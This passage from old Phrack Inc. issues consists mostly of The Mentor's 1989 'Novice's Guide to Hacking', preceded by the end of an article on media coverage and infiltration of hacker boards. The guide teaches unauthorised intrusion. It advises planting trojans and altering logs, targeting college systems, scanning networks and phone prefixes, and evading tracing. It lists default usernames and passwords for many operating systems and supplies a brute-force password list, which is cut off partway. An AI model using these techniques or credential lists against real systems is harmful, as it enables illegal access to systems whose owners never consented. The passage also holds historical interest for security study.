  684. Examiner who now has moved up to the New York Times.  Almost t everything Oryan
  685. QUEST has told John Markoff are utter and complete lies and false boasts about
  686. the powerful things OQ liked to think he could do with a computer.  This in
  687. itself is harmless, but when it gets printed in newspapers like the New York
  688. Times, the general public get a misleading look at the hacker community which
  689. can only do us harm.  John Markoff has gone on to receive great fame as a news
  690. reporter and is now considered a hacker expert -- utterly ridiculous.
  691. _______________________________________________________________________________
  692.  
  693. Infiltration
  694. ~~~~~~~~~~~~
  695. One way in which the hacking community is constantly being infiltrated happens
  696. on some of today's best known bulletin boards.  Boards like Pirate-80 sysoped
  697. by Scan Man (who was also working for Telemarketing Company; a
  698. telecommunications reseller in Charleston, West Virginia) can be a major
  699. problem.  On P-80 anyone can get an account if you pay a nominal fee and from
  700. there a security consultant just has to start posted supplied information to
  701. begin to draw attention and fame as being a super hacker.  Eventually he will
  702. be asked to join ill-formed groups and start to appear on boards with higher
  703. levels of information and blend into the community.  After a while he will be
  704. beyond suspicion and as such he has successfully entered the phreak/hack world.
  705. Dan The Operator was one such agent who acted in this way and would have gone
  706. on being undiscovered if not for the events of SummerCon '87 whereafter he was
  707. exposed by Knight Lightning and Phrack Inc.
  708.  
  709.  
  710. :Knight Lightning
  711.  
  712.                             "The Future Is Forever"
  713.  
  714. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  715. =========================================================================
  716.  
  717.                                 ==Phrack Inc.==
  718.  
  719.                       Volume Two, Issue 22, File 4 of 12
  720.  
  721.                +++++++++++++++++++++++++++++++++++++++++++++++++
  722.                |              The LOD/H Presents               |
  723. ++++++++++++++++                                               ++++++++++++++++
  724.                   A Novice's Guide to Hacking- 1989 edition                 /
  725.                   =========================================                /
  726.                                      by                                   /
  727.                                  The Mentor                              /
  728.                        Legion of Doom/Legion of Hackers                 /
  729.                                                                        /
  730.                                December, 1988                         /
  731.                           Merry Christmas Everyone!                  /
  732.          +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/
  733.  
  734.  
  735. The author hereby grants permission to reproduce, redistribute, or include this
  736. file in your g-file section, electronic or print newletter, or any other form
  737. of transmission that you choose, as long as it is kept intact and whole, with
  738. no ommissions, deletions, or changes.
  739.  
  740.       (C) The Mentor- Phoenix Project Productions 1988,1989  512/441-3088
  741.  
  742.  
  743. Introduction:  The State of the Hack
  744. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  745. After surveying a rather large g-file collection, my attention was drawn to the
  746. fact that there hasn't been a good introductory file written for absolute
  747. beginners since back when Mark Tabas was cranking them out (and almost
  748. *everyone* was a beginner!)  The Arts of Hacking and Phreaking have changed
  749. radically since that time, and as the 90's approach, the hack/phreak community
  750. has recovered from the Summer '87 busts (just like it recovered from the Fall
  751. '85 busts, and like it will always recover from attempts to shut it down), and
  752. the progressive media (from Reality Hackers magazine to William Gibson and
  753. Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice
  754. of us for the first time in recent years in a positive light.
  755.  
  756. Unfortunately, it has also gotten more dangerous since the early 80's.  Phone
  757. cops have more resources, more awareness, and more intelligence than they
  758. exhibited in the past.  It is becoming more and more difficult to survive as a
  759. hacker long enough to become skilled in the art.  To this end this file is
  760. dedicated.  If it can help someone get started, and help them survive to
  761. discover new systems and new information, it will have served it's purpose, and
  762. served as a partial repayment to all the people who helped me out when was a
  763. beginner.
  764.  
  765. Contents
  766. ~~~~~~~~
  767. This file will be divided into four parts:
  768.      Part 1:  What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
  769.      Part 2:  Packet Switching Networks: Telenet- How it Works, How to Use it,
  770.               Outdials, Network Servers, Private PADs
  771.      Part 3:  Identifying a Computer, How to Hack In, Operating System Defaults
  772.      Part 4:  Conclusion; Final Thoughts, Books to Read, Boards to Call,
  773.               Acknowledgements
  774.  
  775. Part One:  The Basics
  776. ~~~~~~~~~~~~~~~~~~~~~
  777. As long as there have been computers, there have been hackers.  In the 50's at
  778. the Massachusets Institute of Technology (MIT), students devoted much time and
  779. energy to ingenious exploration of the computers.  Rules and the law were
  780. disregarded in their pursuit for the 'hack.'  Just as they were enthralled with
  781. their pursuit of information, so are we.  The thrill of the hack is not in
  782. breaking the law, it's in the pursuit and capture of knowledge.
  783.  
  784. To this end, let me contribute my suggestions for guidelines to follow to
  785. ensure that not only you stay out of trouble, but you pursue your craft without
  786. damaging the computers you hack into or the companies who own them.
  787.  
  788. I.    Do not intentionally damage *any* system.
  789. II.   Do not alter any system files other than ones needed to ensure your
  790.       escape from detection and your future access (Trojan Horses, Altering
  791.       Logs, and the like are all necessary to your survival for as long as
  792.       possible).
  793. III.  Do not leave your (or anyone else's) real name, real handle, or real
  794.       phone number on any system that you access illegally.  They *can* and
  795.       will track you down from your handle!
  796. IV.   Be careful who you share information with.  Feds are getting trickier
  797.       Generally, if you don't know their voice phone number, name, and
  798.       occupation or haven't spoken with them voice on non-info trading
  799.       conversations, be wary.
  800. V.    Do not leave your real phone number to anyone you don't know.  This
  801.       includes logging on boards, no matter how k-rad they seem.  If you don't
  802.       know the sysop, leave a note telling some trustworthy people that will
  803.       validate you.
  804. VI.   Do not hack government computers.  Yes, there are government systems that
  805.       are safe to hack, but they are few and far between.  And the government
  806.       has inifitely more time and resources to track you down than a company
  807.       who has to make a profit and justify expenses.
  808. VII.  Don't use codes unless there is *NO* way around it (you don't have a
  809.       local telenet or tymnet outdial and can't connect to anything 800).  You
  810.       use codes long enough, you will get caught.  Period.
  811. VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
  812.       It doesn't hurt to store everything encrypted on your hard disk, or
  813.       keep your notes buried in the backyard or in the trunk of your car.  You
  814.       may feel a little funny, but you'll feel a lot funnier when you when you
  815.       meet Bruno, your transvestite cellmate who axed his family to death.
  816. IX.   Watch what you post on boards.  Most of the really great hackers in the
  817.       country post *nothing* about the system they're currently working except
  818.       in the broadest sense (I'm working on a UNIX, or a COSMOS, or something
  819.       generic.  Not "I'm hacking into General Electric's Voice Mail
  820.       System" or something inane and revealing like that).
  821. X.    Don't be afraid to ask questions.  That's what more experienced hackers
  822.       are for.  Don't expect *everything* you ask to be answered, though.
  823.       There are some things (LMOS, for instance) that a begining hacker
  824.       shouldn't mess with.  You'll either get caught, or screw it up for
  825.       others, or both.
  826. XI.   Finally, you have to actually hack.  You can hang out on boards all you
  827.       want, and you can read all the text files in the world, but until you
  828.       actually start doing it, you'll never know what it's all about.  There's
  829.       no thrill quite the same as getting into your first system (well, ok, I
  830.       can thinksavea couple of biggers thrills, but you get the picture).
  831.  
  832. One of the safest places to start your hacking career is on a computer system
  833. belonging to a college.  University computers have notoriously lax security,
  834. and are more used to hackers, as every college computer department ment has one
  835. or two, so are less likely to press charges if you should be detected.  But the
  836. odds of them detecting you and having the personel to committ to tracking you
  837. down are slim as long as you aren't destructive.
  838.  
  839. If you are already a college student, this is ideal, as you can legally explore
  840. your computer system to your heart's desire, then go out and look for similar
  841. systems that you can penetrate with confidence, as you're already
  842. familar with them.
  843.  
  844. So if you just want to get your feet wet, call your local college.  Many of
  845. them will provide accounts for local residents at a nominal (under $20) charge.
  846.  
  847. Finally, if you get caught, stay quiet until you get a lawyer.  Don't volunteer
  848. any information, no matter what kind of 'deals' they offer you.  Nothing is
  849. binding unless you make the deal through your lawyer, so you might as well shut
  850. up and wait.
  851.  
  852. Part Two:  Networks
  853. ~~~~~~~~~~~~~~~~~~~
  854. The best place to begin hacking (other than a college) is on one of the
  855. bigger networks such as Telenet.  Why?  First, there is a wide variety of
  856. computers to choose from, from small Micro-Vaxen to huge Crays.  Second, the
  857. networks are fairly well documented.  It's easier to find someone who can help
  858. you with a problem off of Telenet than it is to find assistance concerning your
  859. local college computer or high school machine.  Third, the networks are safer.
  860. Because of the enormous number of calls that are fielded every day by the big
  861. networks, it is not financially practical to keep track of where every call and
  862. connection are made from.  It is also very easy to disguise your location using
  863. the network, which makes your hobby much more secure.
  864.  
  865. Telenet has more computers hooked to it than any other system in the world once
  866. you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,
  867. DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of
  868. which you can connect to from your terminal.
  869.  
  870. The first step that you need to take is to identify your local dialup port.
  871. This is done by dialing 1-800-424-9494 (1200 7E1) and connecting.  It will
  872. spout some garbage at you and then you'll get a prompt saying 'TERMINAL= '.
  873. This is your terminal type.  If you have vt100 emulation, type it in now.  Or
  874. just hit return and it will default to dumb terminal mode.
  875.  
  876. You'll now get a prompt that looks like a @.  From here, type @c mail <cr> and
  877. then it will ask for a Username.  Enter 'phones' for the username.  When it
  878. asks for a password, enter 'phones' again.  From this point, it is menu driven.
  879. Use this to locate your local dialup, and call it back locally.  If you don't
  880. have a local dialup, then use whatever means you wish to connect to one long
  881. distance (more on this later).
  882.  
  883. When you call your local dialup, you will once again go through the TERMINAL=
  884. stuff, and once again you'll be presented with a @.  This prompt lets you know
  885. you are connected to a Telenet PAD.  PAD stands for either Packet
  886. Assembler/Disassembler (if you talk to an engineer), or Public Access Device
  887. (if you talk to Telenet's marketing people.)  The first description is more
  888. correct.
  889.  
  890. Telenet works by taking the data you enter in on the PAD you dialed into,
  891. bundling it into a 128 byte chunk (normally... this can be changed), and then
  892. transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who
  893. then takes the data and hands it down to whatever computer or system it's
  894. connected to.  Basically, the PAD allows two computers that have different baud
  895. rates or communication protocols to communicate with each other over a long
  896. distance.  Sometimes you'll notice a time lag in the remote machines response.
  897. This is called PAD Delay, and is to be expected when you're sending data
  898. through several different links.
  899.  
  900. What do you do with this PAD?  You use it to connect to remote computer
  901. systems by typing 'C' for connect and then the Network User Address (NUA) of
  902. the system you want to go to.
  903.  
  904. An NUA takes the form of   031103130002520
  905.                            ___/___/___/
  906.                              |    |    |
  907.                              |    |    |____ network address
  908.                              |    |_________ area prefix
  909.                              |______________ DNIC
  910.  
  911.  
  912. This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)
  913. according to their country and network name.
  914.  
  915.  
  916. DNIC   Network Name    Country          DNIC   Network Name    Country
  917. _______________________________________________________________________________
  918.                                      |
  919. 02041   Datanet 1       Netherlands  |  03110   Telenet         USA
  920. 02062   DCS             Belgium      |  03340   Telepac         Mexico
  921. 02080   Transpac        France       |  03400   UDTS-Curacau    Curacau
  922. 02284   Telepac         Switzerland  |  04251   Isranet         Israel
  923. 02322   Datex-P         Austria      |  04401   DDX-P           Japan
  924. 02329   Radaus          Austria      |  04408   Venus-P         Japan
  925. 02342   PSS             UK           |  04501   Dacom-Net       South Korea
  926. 02382   Datapak         Denmark      |  04542   Intelpak        Singapore
  927. 02402   Datapak         Sweden       |  05052   Austpac         Australia
  928. 02405   Telepak         Sweden       |  05053   Midas           Australia
  929. 02442   Finpak          Finland      |  05252   Telepac         Hong Kong
  930. 02624   Datex-P         West Germany |  05301   Pacnet          New Zealand
  931. 02704   Luxpac          Luxembourg   |  06550   Saponet         South Africa
  932. 02724   Eirpak          Ireland      |  07240   Interdata       Brazil
  933. 03020   Datapac         Canada       |  07241   Renpac          Brazil
  934. 03028   Infogram        Canada       |  09000   Dialnet         USA
  935. 03103   ITT/UDTS        USA          |  07421   Dompac          French Guiana
  936. 03106   Tymnet          USA          |
  937.  
  938. There are two ways to find interesting addresses to connect to.  The first and
  939. easiest way is to obtain a copy of the LOD/H Telenet Directory from the LOD/H
  940. Technical Journal 4 or 2600 Magazine.  Jester Sluggo also put out a good list
  941. of non-US addresses in Phrack Inc. Newsletter Issue 21.  These files will tell
  942. you the NUA, whether it will accept collect calls or not, what type of computer
  943. system it is (if known) and who it belongs to (also if known.)
  944.  
  945. The second method of locating interesting addresses is to scan for them
  946. manually.  On Telenet, you do not have to enter the 03110 DNIC to connect to a
  947. Telenet host.  So if you saw that 031104120006140 had a VAX on it you wanted to
  948. look at, you could type @c 412 614 (0's can be ignored most of the time).
  949.  
  950. If this node allows collect billed connections, it will say 412 614 CONNECTED
  951. and then you'll possibly get an identifying header or just a Username: prompt.
  952. If it doesn't allow collect connections, it will give you a message such as 412
  953. 614 REFUSED COLLECT CONNECTION with some error codes out to the right, and
  954. return you to the @ prompt.
  955.  
  956. There are two primary ways to get around the REFUSED COLLECT message.  The
  957. first is to use a Network User Id (NUI) to connect.  An NUI is a username/pw
  958. combination that acts like a charge account on Telenet.  To collect to node
  959. 412 614 with NUI junk4248, password 525332, I'd type the following:
  960. @c 412 614,junk4248,525332  <---- the 525332 will *not* be echoed to the
  961. screen.  The problem with NUI's is that they're hard to come by unless you're a
  962. good social engineer with a thorough knowledge of Telenet (in which case you
  963. probably aren't reading this section), or you have someone who can provide you
  964. with them.
  965.  
  966. The second way to connect is to use a private PAD, either through an X.25 PAD
  967. or through something like Netlink off of a Prime computer (more on these two
  968. below).
  969.  
  970. The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area
  971. Code that the computer is located in (i.e. 713 xxx would be a computer in
  972. Houston, Texas).  If there's a particular area you're interested in, (say, New
  973. York City 914), you could begin by typing @c 914 001 <cr>.  If it connects, you
  974. make a note of it and go on to 914 002.  You do this until you've found some
  975. interesting systems to play with.
  976.  
  977. Not all systems are on a simple xxx yyy address.  Some go out to four or five
  978. digits (914 2354), and some have decimal or numeric extensions (422 121A = 422
  979. 121.01).  You have to play with them, and you never know what you're going to
  980. find.  To fully scan out a prefix would take ten million attempts per prefix.
  981. For example, if I want to scan 512 completely, I'd have to start with 512
  982. 00000.00 and go through 512 00000.99, then increment the address by 1 and try
  983. 512 00001.00 through 512 00001.99.  A lot of scanning.  There are plenty of
  984. neat computers to play with in a 3-digit scan, however, so don't go berserk
  985. with the extensions.
  986.  
  987. Sometimes you'll attempt to connect and it will just be sitting there after one
  988. or two minutes.  In this case, you want to abort the connect attempt by sending
  989. a hard break (this varies with different term programs, on Procomm, it's
  990. ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.
  991.  
  992. If you connect to a computer and wish to disconnect, you can type <cr> @ <cr>
  993. and you it should say TELENET and then give you the @ prompt.  From there, type
  994. D to disconnect or CONT to re-connect and continue your session uninterrupted.
  995.  
  996. Outdials, Network Servers, and PADs
  997. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  998. In addition to computers, an NUA may connect you to several other things. One
  999. of the most useful is the outdial.  An outdial is nothing more than a modem
  1000. you can get to over telenet -- similar to the PC Pursuit concept, except that
  1001. these don't have passwords on them most of the time.
  1002.  
  1003. When you connect, you will get a message like 'Hayes 1200 baud outdial,
  1004. Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established on
  1005. Modem 5588.'  The best way to figure out the commands on these is to type ? or
  1006. H or HELP -- this will get you all the information that you need to use one.
  1007.  
  1008. Safety tip here -- when you are hacking *any* system through a phone dialup,
  1009. always use an outdial or a diverter, especially if it is a local phone number
  1010. to you.  More people get popped hacking on local computers than you can
  1011. imagine, Intra-LATA calls are the easiest things in the world to trace
  1012. inexpensively.
  1013.  
  1014. Another nice trick you can do with an outdial is use the redial or macro
  1015. function that many of them have.  First thing you do when you connect is to
  1016. invoke the 'Redial Last Number' facility.  This will dial the last number used,
  1017. which will be the one the person using it before you typed.  Write down the
  1018. number, as no one would be calling a number without a computer on it.  This is
  1019. a good way to find new systems to hack.  Also, on a VENTEL modem, type 'D' for
  1020. Display and it will display the five numbers stored as macros in the modem's
  1021. memory.
  1022.  
  1023. There are also different types of servers for remote Local Area Networks (LAN)
  1024. that have many machine all over the office or the nation connected to them.
  1025. I'll discuss identifying these later in the computer ID section.
  1026.  
  1027. And finally, you may connect to something that says 'X.25 Communication PAD'
  1028. and then some more stuff, followed by a new @ prompt.  This is a PAD just like
  1029. the one you are on, except that all attempted connections are billed to the
  1030. PAD, allowing you to connect to those nodes who earlier refused collect
  1031. connections.
  1032.  
  1033. This also has the added bonus of confusing where you are connecting from.  When
  1034. a packet is transmitted from PAD to PAD, it contains a header that has the
  1035. location you're calling from.  For instance, when you first connected to
  1036. Telenet, it might have said 212 44A CONNECTED if you called from the 212 area
  1037. code.  This means you were calling PAD number 44A in the 212 area.  That 21244A
  1038. will be sent out in the header of all packets leaving the PAD.
  1039.  
  1040. Once you connect to a private PAD, however, all the packets going out from *it*
  1041. will have it's address on them, not yours.  This can be a valuable buffer
  1042. between yourself and detection.
  1043.  
  1044. Phone Scanning
  1045. ~~~~~~~~~~~~~~
  1046. Finally, there's the time-honored method of computer hunting that was made
  1047. famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie
  1048. Wargames.  You pick a three digit phone prefix in your area and dial every
  1049. number from 0000 --> 9999 in that prefix, making a note of all the carriers you
  1050. find.  There is software available to do this for nearly every computer in the
  1051. world, so you don't have to do it by hand.
  1052.  
  1053. Part Three:  I've Found a Computer, Now What?
  1054. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1055. This next section is applicable universally.  It doesn't matter how you found
  1056. this computer, it could be through a network, or it could be from carrier
  1057. scanning your High School's phone prefix, you've got this prompt this prompt,
  1058. what the hell is it?
  1059.  
  1060. I'm *NOT* going to attempt to tell you what to do once you're inside of any of
  1061. these operating systems.  Each one is worth several G-files in its own right.
  1062. I'm going to tell you how to identify and recognize certain OpSystems, how to
  1063. approach hacking into them, and how to deal with something that you've never
  1064. seen before and have know idea what it is.
  1065.  
  1066.  
  1067. VMS -      The VAX computer is made by Digital Equipment Corporation (DEC), and
  1068.            runs the VMS (Virtual Memory System) operating system. VMS is
  1069.            characterized by the 'Username:' prompt.  It will not tell you if
  1070.            you've entered a valid username or not, and will disconnect you
  1071.            after three bad login attempts.  It also keeps track of all failed
  1072.            login attempts and informs the owner of the account next time s/he
  1073.            logs in how many bad login attempts were made on the account.  It is
  1074.            one of the most secure operating systems around from the outside,
  1075.            but once you're in there are many things that you can do to
  1076.            circumvent system security.  The VAX also has the best set of help
  1077.            files in the world.  Just type HELP and read to your heart's
  1078.            content.
  1079.  
  1080.            Common Accounts/Defaults:  [username: password [[,password]]]
  1081.  
  1082.            SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
  1083.            OPERATOR:   OPERATOR
  1084.            SYSTEST:    UETP
  1085.            SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
  1086.            FIELD:      FIELD or SERVICE
  1087.            GUEST:      GUEST or unpassworded
  1088.            DEMO:       DEMO  or unpassworded
  1089.            DECNET:     DECNET
  1090.  
  1091.  
  1092. DEC-10 -   An earlier line of DEC computer equipment, running the TOPS-10
  1093.            operating system.  These machines are recognized by their '.'
  1094.            prompt.  The DEC-10/20 series are remarkably hacker-friendly,
  1095.            allowing you to enter several important commands without ever
  1096.            logging into the system.  Accounts are in the format [xxx,yyy]
  1097.            where xxx and yyy are integers.  You can get a listing of the
  1098.            accounts and the process names of everyone on the system before
  1099.            logging in with the command .systat (for SYstem STATus).  If you
  1100.            seen an account that reads [234,1001]   BOB JONES, it might be wise
  1101.            to try BOB or JONES or both for a password on this account.  To
  1102.            login, you type .login xxx,yyy  and then type the password when
  1103.            prompted for it.
  1104.  
  1105.            The system will allow you unlimited tries at an account, and does
  1106.            not keep records of bad login attempts.  It will also inform you if
  1107.            the UIC you're trying (UIC = User Identification Code, 1,2 for
  1108.            example) is bad.
  1109.  
  1110.            Common Accounts/Defaults:
  1111.  
  1112.            1,2:        SYSLIB or OPERATOR or MANAGER
  1113.            2,7:        MAINTAIN
  1114.            5,30:       GAMES
  1115.  
  1116. UNIX -     There are dozens of different machines out there that run UNIX.
  1117.            While some might argue it isn't the best operating system in the
  1118.            world, it is certainly the most widely used.  A UNIX system will
  1119.            usually have a prompt like 'login:' in lower case.  UNIX also will
  1120.            give you unlimited shots at logging in (in most cases), and there is
  1121.            usually no log kept of bad attempts.
  1122.  
  1123.            Common Accounts/Defaults:  (note that some systems are case
  1124.            sensitive, so use lower case as a general rule.  Also, many times
  1125.            the accounts will be unpassworded, you'll just drop right in!)
  1126.  
  1127.            root:       root
  1128.            admin:      admin
  1129.            sysadmin:   sysadmin or admin
  1130.            unix:       unix
  1131.            uucp:       uucp
  1132.            rje:        rje
  1133.            guest:      guest
  1134.            demo:       demo
  1135.            daemon:     daemon
  1136.            sysbin:     sysbin
  1137.  
  1138. Prime -    Prime computer company's mainframe running the Primos operating
  1139.            system.  The are easy to spot, as the greet you with 'Primecon
  1140.            18.23.05' or the like, depending on the version of the operating
  1141.            system you run into.  There will usually be no prompt offered, it
  1142.            will just look like it's sitting there.  At this point, type 'login
  1143.            <username>'.  If it is a pre-18.00.00 version of Primos, you can hit
  1144.            a bunch of ^C's for the password and you'll drop in.  Unfortunately,
  1145.            most people are running versions 19+.  Primos also comes with a good
  1146.            set of help files.  One of the most useful features of a Prime on
  1147.            Telenet is a facility called NETLINK.  Once you're inside, type
  1148.            NETLINK and follow the help files.  This allows you to connect to
  1149.            NUA's all over the world using the 'nc' command.
  1150.  
  1151.            For example, to connect to NUA 026245890040004, you would type
  1152.            @nc :26245890040004 at the netlink prompt.
  1153.  
  1154.            Common Accounts/Defaults:
  1155.  
  1156.            PRIME       PRIME or PRIMOS
  1157.            PRIMOS_CS   PRIME or PRIMOS
  1158.            PRIMENET    PRIMENET
  1159.            SYSTEM      SYSTEM or PRIME
  1160.            NETLINK     NETLINK
  1161.            TEST        TEST
  1162.            GUEST       GUEST
  1163.            GUEST1      GUEST
  1164.  
  1165. HP-x000 -  This system is made by Hewlett-Packard.  It is characterized by the
  1166.            ':' prompt.  The HP has one of the more complicated login sequneces
  1167.            around -- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
  1168.            Fortunately, some of these fields can be left blank in many cases.
  1169.            Since any and all of these fields can be passworded, this is not the
  1170.            easiest system to get into, except for the fact that there are
  1171.            usually some unpassworded accounts around.  In general, if the
  1172.            defaults don't work, you'll have to brute force it using the common
  1173.            password list (see below.)  The HP-x000 runs the MPE operating
  1174.            system, the prompt for it will be a ':', just like the logon prompt.
  1175.  
  1176.            Common Accounts/Defaults:
  1177.  
  1178.            MGR.TELESUP,PUB                      User: MGR Acct: HPONLYG rp: PUB
  1179.            MGR.HPOFFICE,PUB                     unpassworded
  1180.            MANAGER.ITF3000,PUB                  unpassworded
  1181.            FIELD.SUPPORT,PUB                    user: FLD,  others unpassworded
  1182.            MAIL.TELESUP,PUB                     user: MAIL, others unpassworded
  1183.            MGR.RJE                              unpassworded
  1184.            FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96   unpassworded
  1185.            MGR.TELESUP,PUB,HPONLY,HP3           unpassworded
  1186.  
  1187. IRIS -     IRIS stands for Interactive Real Time Information System.  It
  1188.            originally ran on PDP-11's, but now runs on many other minis.  You
  1189.            can spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing'
  1190.            banner, and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at
  1191.            hacking in, and keeps no logs of bad attempts.  I don't know any
  1192.            default passwords, so just try the common ones from the password
  1193.            database below.
  1194.  
  1195.            Common Accounts:
  1196.  
  1197.            MANAGER
  1198.            BOSS
  1199.            SOFTWARE
  1200.            DEMO
  1201.            PDP8
  1202.            PDP11
  1203.            ACCOUNTING
  1204.  
  1205. VM/CMS -   The VM/CMS operating system runs in International Business Machines
  1206.            (IBM) mainframes.  When you connect to one of these, you will get
  1207.            message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
  1208.            just like TOPS-10 does.  To login, you type 'LOGON <username>'.
  1209.  
  1210.            Common Accounts/Defaults are:
  1211.  
  1212.            AUTOLOG1:            AUTOLOG or AUTOLOG1
  1213.            CMS:                 CMS
  1214.            CMSBATCH:            CMS or CMSBATCH
  1215.            EREP:                EREP
  1216.            MAINT:               MAINT or MAINTAIN
  1217.            OPERATNS:            OPERATNS or OPERATOR
  1218.            OPERATOR:            OPERATOR
  1219.            RSCS:                RSCS
  1220.            SMART:               SMART
  1221.            SNA:                 SNA
  1222.            VMTEST:              VMTEST
  1223.            VMUTIL:              VMUTIL
  1224.            VTAM:                VTAM
  1225.  
  1226. NOS -      NOS stands for Networking Operating System, and runs on the Cyber
  1227.            computer made by Control Data Corporation.  NOS identifies itself
  1228.            quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE SYSTEM.
  1229.            COPYRIGHT CONTROL DATA 1978,1987.'  The first prompt you will get
  1230.            will be FAMILY:.  Just hit return here.  Then you'll get a USER
  1231.            NAME: prompt.  Usernames are typically 7 alpha-numerics characters
  1232.            long, and are *extremely* site dependent.  Operator accounts begin
  1233.            with a digit, such as 7ETPDOC.
  1234.  
  1235.            Common Accounts/Defaults:
  1236.  
  1237.            $SYSTEM              unknown
  1238.            SYSTEMV              unknown
  1239.  
  1240. Decserver- This is not truly a computer system, but is a network server that
  1241.            has many different machines available from it.  A Decserver will say
  1242.            'Enter Username>' when you first connect.  This can be anything, it
  1243.            doesn't matter, it's just an identifier.  Type 'c', as this is the
  1244.            least conspicuous thing to enter.  It will then present you with a
  1245.            'Local>' prompt.  From here, you type 'c <systemname>' to connect to
  1246.            a system.  To get a list of system names, type 'sh services' or 'sh
  1247.            nodes'.  If you have any problems, online help is available with the
  1248.            'help' command.  Be sure and look for services named 'MODEM' or
  1249.            'DIAL' or something similar, these are often outdial modems and can
  1250.            be useful!
  1251. GS/1 -     Another type of network server.  Unlike a Decserver, you can't
  1252.            predict what prompt a GS/1 gateway is going to give you.  The
  1253.            default prompt it 'GS/1>', but this is redifinable by the system
  1254.            administrator.  To test for a GS/1, do a 'sh d'.  If that prints out
  1255.            a large list of defaults (terminal speed, prompt, parity, etc...),
  1256.            you are on a GS/1.  You connect in the same manner as a Decserver,
  1257.            typing 'c <systemname>'.  To find out what systems are available, do
  1258.            a 'sh n' or a 'sh c'.  Another trick is to do a 'sh m', which will
  1259.            sometimes show you a list of macros for logging onto a system.  If
  1260.            there is a macro named VAX, for instance, type 'do VAX'.
  1261.  
  1262.            The above are the main system types in use today.  There are
  1263.            hundreds of minor variants on the above, but this should be enough
  1264.            to get you started.
  1265.  
  1266. Unresponsive Systems
  1267. ~~~~~~~~~~~~~~~~~~~~
  1268. Occasionally you will connect to a system that will do nothing, but sit there.
  1269. This is a frustrating feeling, but a methodical approach to the system will
  1270. yield a response if you take your time.  The following list will usually make
  1271. *something* happen.
  1272.  
  1273. 1)  Change your parity, data length, and stop bits.  A system that won't
  1274.     respond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don't have a term
  1275.     program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
  1276.     with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
  1277.     While having a good term program isn't absolutely necessary, it sure is
  1278.     helpful.
  1279. 2)  Change baud rates.  Again, if your term program will let you choose odd
  1280.     baud rates such as 600 or 1100, you will occasionally be able to penetrate
  1281.     some very interesting systems, as most systems that depend on a strange
  1282.     baud rate seem to think that this is all the security they need...
  1283. 3)  Send a series of <cr>'s.
  1284. 4)  Send a hard break followed by a <cr>.
  1285. 5)  Type a series of .'s (periods).  The Canadian network Datapac responds to
  1286.     this.
  1287. 6)  If you're getting garbage, hit an 'i'.  Tymnet responds to this, as does a
  1288.     MultiLink II.
  1289. 7)  Begin sending control characters, starting with ^A --> ^Z.
  1290. 8)  Change terminal emulations.  What your vt100 emulation thinks is garbage
  1291.     may all of a sudden become crystal clear using ADM-5 emulation.  This also
  1292.     relates to how good your term program is.
  1293. 9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
  1294.     JOIN, HELP, and anything else you can think of.
  1295. 10) If it's a dialin, call the numbers around it and see if a company answers.
  1296.     If they do, try some social engineering.
  1297.  
  1298. Brute Force Hacking
  1299. ~~~~~~~~~~~~~~~~~~~
  1300. There will also be many occasions when the default passwords will not work on
  1301. an account.  At this point, you can either go onto the next system on your
  1302. list, or you can try to 'brute-force' your way in by trying a large database of
  1303. passwords on that one account.  Be careful, though!  This works fine on systems
  1304. that don't keep track of invalid logins, but on a system like a VMS, someone is
  1305. going to have a heart attack if they come back and see '600 Bad Login Attempts
  1306. Since Last Session' on their account.  There are also some operating systems
  1307. that disconnect after 'x' number of invalid login attempts and refuse to allow
  1308. any more attempts for one hour, or ten minutes, or sometimes until the next
  1309. day.
  1310.  
  1311. The following list is taken from my own password database plus the database of
  1312. passwords that was used in the Internet UNIX Worm that was running around in
  1313. November of 1988.  For a shorter group, try first names, computer terms, and
  1314. obvious things like 'secret', 'password', 'open', and the name of the account.
  1315. Also try the name of the company that owns the computer system (if known), the
  1316. company initials, and things relating to the products the company makes or
  1317. deals with.
  1318.                               Password List
  1319.                               =============
  1320.  
  1321.       aaa                daniel             jester             rascal
  1322.       academia           danny              johnny             really
  1323.       ada                dave               joseph             rebecca
  1324.       adrian             deb                joshua             remote
  1325.       aerobics           debbie             judith             rick
  1326.       airplane           deborah            juggle             reagan
  1327.       albany             december           julia              robot
  1328.       albatross          desperate          kathleen           robotics
  1329.       albert             develop            kermit             rolex
  1330.       alex               diet               kernel             ronald
  1331.       alexander          digital            knight             rosebud
  1332.       algebra            discovery          lambda             rosemary
  1333.       alias              disney             larry              roses
  1334.       alpha              dog                lazarus            ruben
  1335.       alphabet           drought            lee                rules
  1336.       ama                duncan             leroy              ruth
  1337.       amy                easy               lewis              sal
  1338.       analog             eatme              light              saxon
  1339.       anchor             edges              lisa               scheme
  1340.       andy               erenity
  1341.       arrow              elizabeth          maggot             sex
  1342.       arthur             ellen              magic              shark
  1343.       asshole            emerald            malcolm            sharon
  1344.       athena             engine             mark               shit
  1345.       atmosphere         engineer           markus             shiva
  1346.       bacchus            enterprise         marty              shuttle
